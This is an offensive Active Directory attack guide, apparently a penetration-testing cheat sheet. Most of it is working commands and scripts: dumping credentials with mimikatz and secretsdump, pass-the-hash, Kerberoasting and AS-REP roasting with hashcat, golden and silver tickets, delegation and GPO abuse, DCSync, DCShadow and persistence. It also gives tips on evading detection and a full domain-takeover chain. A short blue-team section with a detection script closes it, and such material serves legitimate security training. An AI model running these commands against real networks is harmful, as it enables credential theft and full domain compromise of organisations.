Active Directory

Active Directory Attacks — Conquering the Domain


Active Directory is the spine of enterprise infrastructure. It stores user and computer accounts, groups, Group Policy and trust relationships, and its domain controllers run the Kerberos KDC that issues every ticket in the domain. Mastering AD exploitation means mastering corporate network compromise: privilege escalation, credential abuse, and lateral movement at scale.


I. 🧩 Core Concepts

Term                     Description
Domain Controller (DC)   Central AD server hosting the directory database and the Kerberos KDC; all domain authentication goes through it.
Kerberos                 Ticket-based authentication protocol and the default in AD; NTLM remains as the fallback.
LDAP                     Directory access protocol for querying and modifying user, group and computer objects (389/636; 3268 for the global catalog).
Trust                    Relationship between domains or forests allowing accounts from one to authenticate to the other.
SAM / NTDS.dit           SAM holds a host's local account hashes; NTDS.dit is the DC's database holding every domain account's hashes.
Group Policy (GPO)       Configuration management applied to users and computers per OU; whoever can edit a linked GPO can run code on its targets.


II. ⚙️ Reconnaissance & Enumeration

🧠 Identify Domain Information

whoami /all
ipconfig /all
nltest /dsgetdc:<domain>
net view /domain

🧩 Enumerate Domain Users & Groups

net user /domain
net group "Domain Admins" /domain

⚙️ LDAP Enumeration

ldapsearch -x -H ldap://dc.example.local -D "user@example.local" -W -b "dc=example,dc=local" "(objectClass=user)" sAMAccountName memberOf

AD rejects anonymous simple binds by default (only the rootDSE is readable without credentials), so bind as any domain user; a low-privilege account can read almost every object in the directory.

🧠 Automated Recon

bloodhound-python -u user -p pass -d example.local -ns 10.0.0.1 -c All --zip

Upload the zip to the BloodHound GUI → query for shortest paths to Domain Admins. -ns points name resolution at a DC when the attacking host does not use the domain's DNS.


III. 💣 Credential Harvesting Techniques

⚙️ Mimikatz (on Windows, as local admin)

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

sekurlsa::logonpasswords reads LSASS; it fails without SeDebugPrivilege, and on hosts with LSA Protection (RunAsPPL) or Credential Guard it returns nothing useful.

🧠 Dump LSASS Memory (offline)

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

⚙️ Extract from NTDS.dit

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

NTDS.dit is locked while the DC runs; copy it from a volume shadow copy (vssadmin create shadow, or ntdsutil "ac i ntds" "ifm" "create full C:\dump") together with the SYSTEM hive, which holds the boot key needed to decrypt it.

💣 Pass-the-Hash (PTH)

pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' //10.0.0.5 cmd
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@10.0.0.5

The value is LM:NT; the NT hash shown here (31d6cfe0...) is the hash of an empty password, so substitute the real one. PTH with a local account only works for RID 500 or when UAC remote restrictions are disabled (LocalAccountTokenFilterPolicy = 1); domain accounts are not affected.

IV. 🧠 Kerberos-Based Attacks

🧩 Kerberoasting

Any authenticated user can request a service ticket (TGS) for any SPN; the ticket is encrypted with the service account's key, so it can be cracked offline.

GetUserSPNs.py example.local/user:pass -dc-ip 10.0.0.1 -request -outputfile hashes.kerberoast
hashcat -m 13100 hashes.kerberoast rockyou.txt

Mode 13100 is for RC4 tickets ($krb5tgs$23$). Accounts with AES-only keys produce $krb5tgs$17$ / $krb5tgs$18$ hashes (hashcat modes 19600 / 19700), which crack far more slowly. Only user accounts are worth roasting; machine account passwords are 120 random characters.

💣 AS-REP Roasting

Targets users with the "Do not require Kerberos preauthentication" flag (userAccountControl 0x400000): the KDC returns an AS-REP encrypted with the user's key without any proof of the password.

GetNPUsers.py example.local/ -dc-ip 10.0.0.1 -usersfile users.txt -format hashcat -outputfile asrep.hash
hashcat -m 18200 asrep.hash rockyou.txt

With valid credentials, drop -usersfile and run GetNPUsers.py example.local/user:pass -request -format hashcat -outputfile asrep.hash so the script finds the vulnerable accounts via LDAP itself.
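Roasting output from both sections above often mixes encryption types, and hashcat refuses a file whose lines do not match the requested mode. The following is an added example (not code from the original page or from Impacket/hashcat): it assumes the hashcat-format lines that GetUserSPNs.py and GetNPUsers.py write, and the mode numbers in HASHCAT_MODES; the sample lines are constructed, with filler hex in place of real ciphertext.

```python
"""Sort Kerberoast / AS-REP roast output into the right hashcat modes.

Added example, not code from the original page. It assumes the hashcat-format
lines produced by Impacket's GetUserSPNs.py and GetNPUsers.py (-format hashcat)
and the hashcat mode numbers listed in HASHCAT_MODES. The sample lines are
constructed: the hex ciphertext is filler and will not crack to anything.
"""
import re
from collections import defaultdict

# hashcat mode per (ticket kind, Kerberos encryption type)
HASHCAT_MODES = {
    ("tgs", 23): 13100,    # RC4-HMAC TGS-REP          ($krb5tgs$23$)
    ("tgs", 17): 19600,    # AES128-CTS-HMAC-SHA1-96   ($krb5tgs$17$)
    ("tgs", 18): 19700,    # AES256-CTS-HMAC-SHA1-96   ($krb5tgs$18$)
    ("asrep", 23): 18200,  # RC4-HMAC AS-REP           ($krb5asrep$23$)
    ("asrep", 17): 32100,  # AES128 AS-REP, hashcat >= 6.2.6
    ("asrep", 18): 32200,  # AES256 AS-REP, hashcat >= 6.2.6
}

# The header layout differs per etype; capture (etype, account, realm[, spn]).
_PATTERNS = [
    ("tgs",   re.compile(r"^\$krb5tgs\$(23)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$")),
    ("tgs",   re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$")),
    ("asrep", re.compile(r"^\$krb5asrep\$(23)\$([^@]+)@([^:]+):")),
    ("asrep", re.compile(r"^\$krb5asrep\$(17|18)\$([^$]+)\$([^$]+)\$")),
]


def classify(line):
    """Describe one hash line, or return None if it is not a Kerberos hash."""
    line = line.strip()
    for kind, pattern in _PATTERNS:
        m = pattern.match(line)
        if m:
            etype = int(m.group(1))
            return {
                "kind": kind,
                "etype": etype,
                "mode": HASHCAT_MODES[(kind, etype)],
                "account": m.group(2),
                "realm": m.group(3),
                "spn": m.group(4) if kind == "tgs" else None,
                "hash": line,
            }
    return None


def split_by_mode(lines):
    """Group hash lines by hashcat mode; hashcat rejects a file that mixes modes."""
    buckets = defaultdict(list)
    for line in lines:
        info = classify(line)
        if info is not None:
            buckets[info["mode"]].append(info["hash"])
    return dict(buckets)


def hashcat_commands(buckets, wordlist="rockyou.txt", prefix="kerb"):
    """One hashcat invocation per mode, reading the files write_buckets() produces."""
    return [f"hashcat -m {mode} {prefix}_{mode}.txt {wordlist}" for mode in sorted(buckets)]


def write_buckets(buckets, prefix="kerb"):
    for mode, hashes in buckets.items():
        with open(f"{prefix}_{mode}.txt", "w") as fh:
            fh.write("\n".join(hashes) + "\n")


# Constructed sample output, shaped like GetUserSPNs.py / GetNPUsers.py output.
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_sql$EXAMPLE.LOCAL$MSSQLSvc/sql01.example.local:1433*$" + "ab" * 16 + "$" + "cd" * 64,
    "$krb5tgs$18$svc_web$EXAMPLE.LOCAL$*HTTP/web01.example.local*$" + "ab" * 12 + "$" + "cd" * 64,
    "$krb5asrep$23$jsmith@EXAMPLE.LOCAL:" + "ab" * 16 + "$" + "cd" * 64,
    "$krb5asrep$17$tlee$EXAMPLE.LOCAL$" + "ab" * 12 + "$" + "cd" * 64,
    "[*] Getting TGT for user",  # tool chatter that sometimes ends up in the file
]

if __name__ == "__main__":
    for line in SAMPLE_HASHES:
        info = classify(line)
        if info:
            print(f"{info['account']:<10} etype {info['etype']:>2} -> hashcat -m {info['mode']}  {info['spn'] or ''}")
    buckets = split_by_mode(SAMPLE_HASHES)
    write_buckets(buckets)
    print("\n".join(hashcat_commands(buckets)))
```

Feed it the raw output files; the per-mode files and printed commands replace hand-sorting, and the etype column tells you immediately which accounts still accept RC4 (the ones a defender should be watching for in 4769 logs).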

⚙️ Golden Ticket

Full domain compromise by forging a TGT with the krbtgt account's key; requires the krbtgt NT hash (from DCSync or NTDS.dit) and the domain SID.

mimikatz.exe "kerberos::golden /user:Administrator /domain:example.local /sid:S-1-5-21-111222333 /krbtgt:HASH /ptt"

/sid is the domain SID without the trailing RID. Without /ptt the ticket is written to a .kirbi file (/ticket:golden.kirbi) instead of being injected into the current session. A golden ticket stays valid until the krbtgt password has been changed twice.

🧠 Silver Ticket

Forged TGS for one service on one host, signed with that host's machine account key (or the service account's key). The DC is never contacted, so no 4768/4769 events are logged there.

mimikatz.exe "kerberos::golden /user:svc_admin /domain:example.local /sid:S-1-5-21-111222333 /target:dc.example.local /service:cifs /rc4:HASH /ptt"

/rc4 is the NT hash of the account that owns the SPN (for cifs on dc.example.local, the DC's machine account). Services running as SYSTEM rarely validate the PAC with the DC, so the forged group membership is accepted as-is.

V. ⚙️ Lateral Movement Techniques

Technique   Tool              Description
PsExec      impacket-psexec   Uploads a service binary over SMB (ADMIN$) and creates a service; needs local admin and leaves a 7045 service-install event.
WMI Exec    impacket-wmiexec  Remote command execution over WMI (DCOM, 135 plus a dynamic RPC port); output is read back over SMB.
SMBExec     impacket-smbexec  Runs each command as a temporary service through the SCM and reads output from a share; no binary is uploaded.
WinRM       evil-winrm        PowerShell remoting (5985/5986); the user must be a local admin or in Remote Management Users.

🧩 Examples

psexec.py example.local/user:password@10.0.0.5 cmd.exe
wmiexec.py example.local/user:password@10.0.0.5
evil-winrm -i 10.0.0.5 -u Administrator -p Password123

All Impacket scripts take the same target syntax, [domain/]user[:password]@host, and accept -hashes LM:NT or -k (Kerberos, with a ticket in KRB5CCNAME) in place of a password.

VI. 🧠 Privilege Escalation within Domain

⚙️ Find Misconfigured Service Accounts

Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, MemberOf | Select-Object SamAccountName, ServicePrincipalName, MemberOf

Service accounts that hold an SPN and also sit in privileged groups are the priority Kerberoasting targets.

💣 Exploit Delegation

  • Unconstrained delegation → a host with TRUSTED_FOR_DELEGATION caches the TGT of every user that authenticates to it; compromise the host (or coerce a DC to authenticate to it, e.g. with the printer bug or PetitPotam) and extract the TGT from memory.

  • Constrained delegation → an account with msDS-AllowedToDelegateTo can obtain service tickets for those SPNs as any user (S4U2Self + S4U2Proxy); with protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) no incoming user ticket is needed.

  • Resource-based constrained delegation (RBCD) → whoever can write msDS-AllowedToActOnBehalfOfOtherIdentity on a computer object (GenericWrite/WriteDACL/owner, usually found via ACL abuse) can let an attacker-controlled machine account impersonate users to that computer.

rbcd.py -delegate-from 'ATTACKER$' -delegate-to 'VICTIM$' -action write -dc-ip 10.0.0.1 example.local/user:pass
getST.py -spn cifs/victim.example.local -impersonate Administrator -dc-ip 10.0.0.1 'example.local/ATTACKER$:password'

ATTACKER$ is a machine account the attacker controls (created with addcomputer.py while ms-DS-MachineAccountQuota is above 0). getST.py writes the resulting service ticket to a .ccache for use with -k -no-pass.
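The enumeration in section II and the delegation checks above all come down to a few userAccountControl bits and three attributes. The block below is an added example (not from the original page, not part of Impacket or PowerView): it triages a list of account dicts shaped like the attributes an LDAP client returns, so it runs offline against the constructed SAMPLE_ENTRIES, and carries the live LDAP filters that would return the same candidates from a DC.

```python
"""Offline triage of AD account attributes for roasting and delegation abuse.

Added example, not from the original page. It works on a list of dicts shaped like the
attributes an LDAP client (ldap3, ldapsearch) returns, so it runs without a DC; the
SAMPLE_ENTRIES below are constructed. LDAP_FILTERS holds the live queries that would
produce the same candidates.
"""

# userAccountControl bits ([MS-ADTS] / Windows SDK)
ACCOUNTDISABLE                 = 0x0000002
WORKSTATION_TRUST_ACCOUNT      = 0x0001000
SERVER_TRUST_ACCOUNT           = 0x0002000   # domain controllers
TRUSTED_FOR_DELEGATION         = 0x0080000   # unconstrained delegation
DONT_REQ_PREAUTH               = 0x0400000   # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition

BITAND = "1.2.840.113556.1.4.803"  # LDAP matching rule: bitwise AND on integer attributes

LDAP_FILTERS = {
    "kerberoastable": f"(&(objectCategory=person)(servicePrincipalName=*)(!(userAccountControl:{BITAND}:={ACCOUNTDISABLE}))(!(sAMAccountName=krbtgt)))",
    "asrep_roastable": f"(&(objectCategory=person)(userAccountControl:{BITAND}:={DONT_REQ_PREAUTH})(!(userAccountControl:{BITAND}:={ACCOUNTDISABLE})))",
    "unconstrained_delegation": f"(&(userAccountControl:{BITAND}:={TRUSTED_FOR_DELEGATION})(!(userAccountControl:{BITAND}:={SERVER_TRUST_ACCOUNT})))",
    "constrained_delegation": "(msDS-AllowedToDelegateTo=*)",
    "rbcd_target": "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)",
}


def triage(entries):
    """Bucket entries into attack candidates; each entry is a dict of LDAP attributes."""
    findings = {key: [] for key in LDAP_FILTERS}
    for e in entries:
        name = e["sAMAccountName"]
        uac = e.get("userAccountControl", 0)
        enabled = not uac & ACCOUNTDISABLE
        is_computer = "computer" in e.get("objectClass", [])

        # Kerberoasting: enabled user (not a machine, not krbtgt) that owns an SPN
        if enabled and not is_computer and e.get("servicePrincipalName") and name.lower() != "krbtgt":
            findings["kerberoastable"].append(name)
        # AS-REP roasting: pre-authentication disabled on an enabled account
        if enabled and uac & DONT_REQ_PREAUTH:
            findings["asrep_roastable"].append(name)
        # Unconstrained delegation on anything that is not a DC (DCs always have it)
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings["unconstrained_delegation"].append(name)
        # Constrained delegation; protocol transition means no user ticket is needed
        if e.get("msDS-AllowedToDelegateTo"):
            mode = "protocol transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "kerberos only"
            findings["constrained_delegation"].append((name, mode, list(e["msDS-AllowedToDelegateTo"])))
        # RBCD already configured on this object: some principal may impersonate users to it
        if e.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
            findings["rbcd_target"].append(name)
    return findings


# Constructed entries; userAccountControl values are NORMAL_ACCOUNT (0x200) or
# WORKSTATION_TRUST_ACCOUNT (0x1000) combined with the flags under test.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_sql", "objectClass": ["user"], "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.example.local:1433"]},
    {"sAMAccountName": "krbtgt", "objectClass": ["user"], "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "jsmith", "objectClass": ["user"], "userAccountControl": 0x400200},
    {"sAMAccountName": "olduser", "objectClass": ["user"], "userAccountControl": 0x400202},
    {"sAMAccountName": "DC01$", "objectClass": ["computer"], "userAccountControl": 0x82000},
    {"sAMAccountName": "WEB01$", "objectClass": ["computer"], "userAccountControl": 0x81000},
    {"sAMAccountName": "svc_web", "objectClass": ["user"], "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.example.local"]},
    {"sAMAccountName": "APP01$", "objectClass": ["computer"], "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"<security descriptor bytes>"},
]

if __name__ == "__main__":
    for key, hits in triage(SAMPLE_ENTRIES).items():
        print(f"{key:<24} {hits}")
        print(f"{'':<24} live filter: {LDAP_FILTERS[key]}")
```

The disabled krbtgt and olduser entries and the DC01$ computer fall out of every bucket, which is the point: raw attribute dumps are full of accounts that look roastable or delegating but are not usable. For RBCD the attribute value is a security descriptor; who can impersonate is found by decoding its DACL, which this triage does not do.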

VII. ⚙️ ACL & GPO Abuse

🧩 Enumerate Privileges

Get-ObjectAcl -DistinguishedName "CN=Domain Admins,CN=Users,DC=example,DC=local" -ResolveGUIDs

(PowerView; the newer build names the cmdlet Get-DomainObjectAcl and takes -Identity.) Look for GenericAll, GenericWrite, WriteDacl, WriteOwner or the AddMember extended right held by principals you already control; BloodHound draws the same edges.

💣 Modify GPO for Code Execution

New-GPO -Name EvilPolicy | New-GPLink -Target "OU=Workstations,DC=example,DC=local"
Set-GPPermission -Name EvilPolicy -PermissionLevel GpoEditDeleteModifySecurity -TargetName 'Domain Users' -TargetType Group

Creating and linking a GPO needs rights on the Group Policy container and on the target OU. Set-GPPermission as shown only hands edit rights to another principal (a persistence foothold); it executes nothing. Code execution comes from the policy body, typically a startup script or an immediate scheduled task, e.g. SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author EXAMPLE\Administrator --Command "cmd.exe" --Arguments "/c <payload>" --GPOName "EvilPolicy". Clients pick it up on the next policy refresh (every 90 minutes by default, or gpupdate /force).

VIII. 🧠 Abusing Trust Relationships

⚙️ Enumerate Trusts

nltest /domain_trusts
Get-DomainTrust   # PowerView: direction, type and TrustAttributes (FILTER_SIDS = SID filtering enforced)

💣 SID History Injection

Intra-forest (parent/child) trusts do not filter SID history, so a child-domain admin with the child krbtgt hash can forge a ticket carrying the parent's Enterprise Admins SID (RID 519):

mimikatz "kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-<child-sid> /krbtgt:HASH /sids:S-1-5-21-<parent-sid>-519 /ptt"

Across forest trusts, SID filtering strips SIDs from the other forest unless it has been disabled. lsadump::trust /patch dumps the inter-realm trust keys, which can be used to forge inter-realm TGTs (with the same /sids trick) instead of a child-domain golden ticket.

🧠 Cross-Domain Kerberoasting

GetUserSPNs.py child.local/user:pass -dc-ip 10.0.0.1 -target-domain parent.local -request -outputfile cross.kerberoast

parent.local stands in for the trusting domain; Kerberoasting works across any trust that yields a referral TGT, and a low-privilege account in the trusted domain is enough.

IX. ⚙️ Credential Dumping from Workstations

🧩 Registry Hive Extraction

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

SAM gives local account NT hashes; SECURITY adds LSA secrets (service account passwords, the machine account key, DPAPI backup keys) and the cached domain logons. Saving hives requires local admin.

⚙️ Cached Credentials

mimikatz "lsadump::cache"

Cached domain credentials (DCC2 / MSCache v2) cannot be passed, only cracked: hashcat -m 2100. Windows caches the last 10 domain logons by default.

X. ⚙️ Pass-the-Ticket (PTT)

Steal a valid TGT from memory and inject it into your own session:

mimikatz "sekurlsa::tickets /export"
mimikatz "kerberos::ptt ticket.kirbi"
dir \\dc\C$

Exported files are named like [0;3e7]-2-0-40e10000-Administrator@krbtgt-EXAMPLE.LOCAL.kirbi; pick the krbtgt (TGT) one. Works without knowing the user's password until the ticket expires (10 hours by default, renewable up to 7 days). On Windows, Rubeus.exe ptt /ticket:<base64> does the same injection; from Linux, convert with ticketConverter.py to a .ccache, export KRB5CCNAME, and use Impacket with -k -no-pass.


XI. 🧠 DCShadow Attack

Registers a rogue "DC" in the configuration partition and pushes attribute changes through normal replication, so the change never shows up as a directory modification (5136) on a real DC. Needs Domain Admin (or equivalent) plus SYSTEM on the host acting as the rogue DC, and two mimikatz sessions:

mimikatz "lsadump::dcshadow /object:CN=eviluser,CN=Users,DC=example,DC=local /attribute:primaryGroupID /value:512"   # session 1, as SYSTEM: starts the rogue replication server
mimikatz "lsadump::dcshadow /push"   # session 2, as Domain Admin: triggers the replication

Setting primaryGroupID to 512 makes eviluser a Domain Admin without touching the group's member attribute.

XII. ⚙️ DCSync Attack

Uses the DRSUAPI replication call (GetNCChanges) to pull account secrets from a DC. Requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object, which Domain Admins, Enterprise Admins, Administrators and DC computer accounts hold by default.

secretsdump.py -just-dc example.local/Administrator:password@10.0.0.1

or

mimikatz "lsadump::dcsync /domain:example.local /user:krbtgt"

-just-dc-ntlm limits output to NT hashes; -just-dc-user krbtgt pulls a single account.

XIII. 💀 Persistence in Active Directory

Method                  Description
Golden Ticket           Forged TGT signed with the krbtgt key; valid until the krbtgt password has been rotated twice.
SID History Injection   A privileged SID in an ordinary account's sIDHistory keeps admin rights while group listings look clean.
Skeleton Key            Patches LSASS on a DC so one master password works for every account alongside the real one; lost on DC reboot.
AdminSDHolder Abuse     ACEs added to CN=AdminSDHolder,CN=System are re-applied by SDProp to every protected object (Domain Admins members etc.) every 60 minutes, undoing cleanup.
DCShadow                Re-introduces malicious attribute changes via replication, bypassing the DCs' own change auditing.


XIV. ⚙️ Detection Evasion

Operational Security (OPSEC) Tips

  • Avoid noisy enumeration (net group /domain, SharpHound "All" collection) on sensitive hosts; prefer targeted LDAP queries.

  • Use -k (Kerberos auth) instead of NTLM where possible, and request AES tickets rather than RC4 when roasting: RC4 (etype 0x17) requests in an AES domain stand out in 4769 logs.

  • Clearing event logs is itself logged (Security 1102) and is normally out of scope; do it only in labs/CTFs.

  • When forging tickets, use an existing user and RID, a realistic group set, and a lifetime that matches domain policy (10 hours); mimikatz's 10-year default is a classic golden-ticket indicator.


XV. ⚙️ AD Exploitation Toolset

Category             Tool                          Usage
Recon                BloodHound, SharpHound        Privilege path mapping
Credential Dumping   Mimikatz, secretsdump.py      Hash extraction
Kerberos Abuse       Impacket, Rubeus              Ticket operations
Lateral Movement     PsExec, Evil-WinRM, SMBExec   Remote shells
Persistence          DCShadow, AdminSDHolder       Stealth access
Visualization        BloodHound GUI                Attack path analysis


XVI. ⚔️ Real-World Attack Chain Example

# 1. Enumerate Domain Users
net user /domain

# 2. Kerberoast Service Accounts
GetUserSPNs.py corp.local/user:pass -dc-ip 10.0.0.1 -request -outputfile hashes.txt

# 3. Crack Hash
hashcat -m 13100 hashes.txt rockyou.txt

# 4. Use Cracked Creds for Lateral Movement (the service account is a local admin on 10.0.0.5)
psexec.py corp.local/svc_account:CrackedPassword@10.0.0.5 cmd.exe

# 5. Dump NTDS.dit on Domain Controller (needs replication rights, e.g. a DA credential harvested in step 4)
secretsdump.py -just-dc corp.local/Administrator:password@10.0.0.1

# 6. Forge Golden Ticket
mimikatz "kerberos::golden /domain:corp.local /sid:S-1-5-21-<domain-sid> /krbtgt:<hash> /user:Administrator /ptt"

Result → Full Domain Takeover 🏴‍☠️


XVII. 🧩 Defensive Notes (Blue Team Awareness)

Detection            Indicator
Kerberoasting        Burst of 4769 events from one account for many distinct service accounts, ticket encryption type 0x17 (RC4) in an AES-capable domain.
AS-REP Roasting      4768 events with pre-authentication type 0 and RC4 (0x17); audit userAccountControl for DONT_REQ_PREAUTH and alert on the 4738 that sets it.
Golden Ticket        4769 / 4624 activity for an account with no matching 4768 on any DC; klist shows a TGT lifetime far beyond the 10-hour policy (mimikatz default is 10 years); tickets for accounts that do not exist.
DCSync / DCShadow    4662 carrying the DS-Replication-Get-Changes GUIDs (1131f6aa-..., 1131f6ad-...) from a non-DC account; for DCShadow, a new nTDSDSA object (5137) and GC/ SPNs appearing on a workstation's computer account (4742).
AdminSDHolder Abuse  5136 directory-change events on CN=AdminSDHolder,CN=System; diff its ACL against a known-good baseline.
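The indicators in the table are easier to reason about as code. The block below is an added example (not from the original page, not a product's detection content): it runs the Kerberoasting, AS-REP roasting, DCSync and forged-TGT checks over constructed 4768 / 4769 / 4662 records shaped like what a log pipeline yields after parsing the event XML. The field names follow the Windows event schema; the threshold, window and the known_dcs set are assumptions to tune per environment.

```python
"""Run the indicators above over a handful of Windows security events.

Added example, not from the original page. SAMPLE_EVENTS are constructed records in the
shape a log pipeline produces after parsing 4768 / 4769 / 4662 event XML; field names
follow the Windows event schema. Thresholds and the time window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Control-access-right GUIDs that DCSync exercises (AD schema rightsGuid values)
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES128/AES256 are 0x11 / 0x12
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def _user(name):
    """Normalise 'jsmith@EXAMPLE.LOCAL' / 'jsmith' to one comparable key."""
    return name.split("@")[0].lower()


def detect(events, known_dcs, window=timedelta(minutes=10), spn_threshold=4):
    """Return a list of (indicator, subject, detail) alerts."""
    events = sorted(events, key=lambda e: e["time"])
    alerts = []

    # Kerberoasting: one account pulling RC4 service tickets for many distinct
    # service accounts inside the window (machine accounts and krbtgt are not roastable)
    rc4_tgs = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC:
            svc = e["ServiceName"]
            if svc.lower() != "krbtgt" and not svc.endswith("$"):
                rc4_tgs[_user(e["TargetUserName"])].append((e["time"], svc))
    for user, reqs in rc4_tgs.items():
        for start, _ in reqs:  # sliding window over the sorted requests
            services = {s for t, s in reqs if start <= t <= start + window}
            if len(services) >= spn_threshold:
                alerts.append(("kerberoasting", user, sorted(services)))
                break

    # AS-REP roasting: TGT handed out with no pre-authentication, RC4 encrypted
    for e in events:
        if e["EventID"] == 4768 and e["PreAuthType"] == "0" and e["TicketEncryptionType"] == RC4_HMAC:
            alerts.append(("asrep_roasting", _user(e["TargetUserName"]), e["IpAddress"]))

    # DCSync: replication rights exercised by anything that is not a DC computer account
    for e in events:
        if e["EventID"] == 4662:
            rights = set(GUID_RE.findall(e["Properties"].lower())) & REPLICATION_GUIDS
            if rights and e["SubjectUserName"] not in known_dcs:
                alerts.append(("dcsync", _user(e["SubjectUserName"]), sorted(rights)))

    # Forged or injected TGT (golden ticket / PTT): a service ticket requested for an
    # account+client that obtained no TGT from this KDC inside the window. With several
    # DCs the 4768s must be collected from all of them or this false-positives.
    tgts = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768:
            tgts[(_user(e["TargetUserName"]), e["IpAddress"])].append(e["time"])
    for e in events:
        if e["EventID"] == 4769:
            key = (_user(e["TargetUserName"]), e["IpAddress"])
            if not any(e["time"] - window <= t <= e["time"] for t in tgts.get(key, [])):
                alerts.append(("tgs_without_tgt", key[0], e["IpAddress"]))
    return alerts


BASE = datetime(2024, 1, 15, 9, 0)


def _ev(event_id, minute, **fields):
    return {"EventID": event_id, "time": BASE + timedelta(minutes=minute), **fields}


REPL = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [  # constructed
    _ev(4768, 0, TargetUserName="jsmith", IpAddress="10.0.0.50", PreAuthType="2", TicketEncryptionType="0x12"),
    _ev(4769, 1, TargetUserName="jsmith@EXAMPLE.LOCAL", ServiceName="svc_sql", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    _ev(4769, 1, TargetUserName="jsmith@EXAMPLE.LOCAL", ServiceName="svc_web", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    _ev(4769, 2, TargetUserName="jsmith@EXAMPLE.LOCAL", ServiceName="svc_backup", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    _ev(4769, 2, TargetUserName="jsmith@EXAMPLE.LOCAL", ServiceName="svc_sccm", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    _ev(4769, 2, TargetUserName="jsmith@EXAMPLE.LOCAL", ServiceName="FS01$", TicketEncryptionType="0x12", IpAddress="10.0.0.50"),  # normal
    _ev(4768, 3, TargetUserName="tlee", IpAddress="10.0.0.50", PreAuthType="0", TicketEncryptionType="0x17"),
    _ev(4662, 5, SubjectUserName="jsmith", Properties="Control Access " + REPL),
    _ev(4662, 6, SubjectUserName="DC02$", Properties="Control Access " + REPL),  # DC-to-DC replication, benign
    _ev(4769, 8, TargetUserName="Administrator@EXAMPLE.LOCAL", ServiceName="DC01$", TicketEncryptionType="0x12", IpAddress="10.0.0.77"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, known_dcs={"DC01$", "DC02$"}):
        print(alert)
```

Run against the sample it raises exactly four alerts: jsmith roasting four service accounts, tlee's pre-auth-less RC4 TGT, jsmith exercising replication rights, and an Administrator service ticket from 10.0.0.77 that no TGT request preceded. The DC02$ replication event and the AES ticket to FS01$ stay silent, which is the sanity check any such rule needs before it goes into a SIEM.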


XVIII. ⚙️ Quick Reference Table

Technique         Tool                  Command
Kerberoast        Impacket              GetUserSPNs.py -request
AS-REP Roast      Impacket              GetNPUsers.py -format hashcat
Pass-the-Hash     Impacket              psexec.py -hashes LM:NT
Pass-the-Ticket   Mimikatz              kerberos::ptt
DCSync            Mimikatz / Impacket   lsadump::dcsync / secretsdump.py -just-dc
ACL Abuse         PowerView             Get-ObjectAcl / Get-DomainObjectAcl
Persistence       Mimikatz              lsadump::dcshadow

